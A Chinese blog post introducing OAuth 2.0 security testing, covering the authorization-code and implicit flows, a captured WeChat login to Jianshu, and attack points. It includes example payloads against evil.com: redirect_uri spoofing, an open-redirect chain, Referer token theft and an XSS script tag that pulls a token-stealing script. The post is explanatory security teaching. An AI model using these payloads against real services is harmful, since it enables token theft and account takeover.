OAuth2.0安全测试简介
Posted 黄老湿的地摊
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了OAuth2.0安全测试简介相关的知识,希望对你有一定的参考价值。
1、OAuth原理
OAuth是一个关于授权(authorization)的开放网络标准,目前的版本是2.0版可以参考RFC(http://www.rfcreader.com/#rfc6749) ,简单来说OAuth是用来做第三方授权的一套协议,即不泄漏第三方密码,又要让应用有权限访问第三方应用。
常见的使用场景是登录,登录的时候,我们不希望在site A重新注册新用户,而本身应用是支持第三方site C登录的,这个时候,就需要我们在site C授权给site A的应用,让siteA 去site C拉取需要注册的用户信息,然后我们就可以不用注册帐号密码实现登录site A。
oauth2有几种授权模式,主要用到的是2种,授权码模式和简化模式
oauth2实现细节参考:http://www.ruanyifeng.com/blog/2014/05/oauth_2_0.html
授权码模式的特点,主要包括以下几个参数
response_type:表示授权类型,必选项,此处的值固定为"code"
client_id:表示客户端的ID,必选项
redirect_uri:表示重定向URI,可选项
scope:表示申请的权限范围,可选项
state:表示客户端的当前状态,可以指定任意值,认证服务器会原封不动地返回这个值。
简化模式的特点,请求参数包括如下几个参数
response_type:表示授权类型,此处的值固定为"token",必选项。
client_id:表示客户端的ID,必选项。
redirect_uri:表示重定向的URI,可选项。
scope:表示权限范围,可选项。
state:表示客户端的当前状态,可以指定任意值,认证服务器会原封不动地返回这个值。
返回结果,url中通常包括#hash,如下
HTTP/1.1 302 Found
Location:http://example.com/cb#access_token=2YotnFZFEjr1zCsicMWpAA&state=xyz&token_type=example&expires_in=3600
2、举例说明
一个简单的例子,用简书登录做说明,我们要登录简书,如下所示,不注册账户,可以采用微信授权登录的方式,
整个请求就几个包,如下图所示
抓包能够看到的也就是3个重要包,点击微信图标,提交,一个请求
https://www.jianshu.com/users/auth/wechat
返回一个跳转,继续请求
https://open.weixin.qq.com/connect/qrconnect?appid=wxe9199d568fe57fdd&client_id=wxe9199d568fe57fdd&redirect_uri=http://www.jianshu.com/users/auth/wechat/callback&response_type=code&scope=snsapi_login&state=%7B%7D
需要点开手机微信授权,一个二维码,微信扫描就ok
授权成功之后,返回code码,
https://www.jianshu.com/users/auth/wechat/callback?code=021rb9Bp1xj37k0kvMzp1JI3Bp1rb9BK&state=%7B%7D
自动提交请求就可以登录了
实际上整个流程有8步,第6、7步是浏览器抓包看不到的。
3、可能存在的风险点
具体案例可以参考wooyun漏洞案例
1、state参数,state参数如果没有,或者为一个固定值,容易造成csrf漏洞,欺骗受害者点击,即可把权限绑定到一个设置好的client_id。
2、redirect_uri参数未校验造成的漏洞
redirect_uri在第3步请求之后,服务端可能没有校验,直接通过第4步把code发到攻击者控制的页面
redirect_uri在第6步,服务端可能没有校验,那么攻击者直接获取权限。
针对这个redirect_uri未校验,主要有以下几种利用方式:
b、利用url欺骗 比如 auth.app.com@evil.com
d、利用可信域url跳转获取referer
redirect_uri=http://auth.com/redirect.php?url=http://evil.com
e、利用跨域请求从referer偷取token
在我们不能绕过redirect_uri的判断规则时,我们可以使利用跨域请求从referer中偷取token.
redirect_uri限制为app.com,然而app.com/article/1.html中允许用户发表文章,在文章中嵌入来自evil.com的外部图片.这时我们可以让redirect_uri指向该文章app.com/article/1.html,当该文章被访问时,会自动获取 evil.com/test.jpg ,这时攻击者即可从请求头的referer拿到token
f、利用XSS实现跨域
redirect_uri = http://auth.com/ajax/cat.html?callback=<script src="http://evil.com?getToken.js"></script>
总的来说,这个漏洞,利用场景相对苛刻,不好利用。需要欺骗别人点击(不点击需要csrf环境),并且点击的时候,还需要已经登录第三方应用(不可能笨到扫二维码吧……)。
参考:
http://www.ruanyifeng.com/blog/2014/05/oauth_2_0.html
https://blog.csdn.net/cd_xuyue/article/details/52084220
http://coolshell.cn/articles/11021.html
https://blog.csdn.net/cd_xuyue/article/details/52084220
https://www.cnblogs.com/flashsun/p/7424071.html
以上是关于OAuth2.0安全测试简介的主要内容,如果未能解决你的问题,请参考以下文章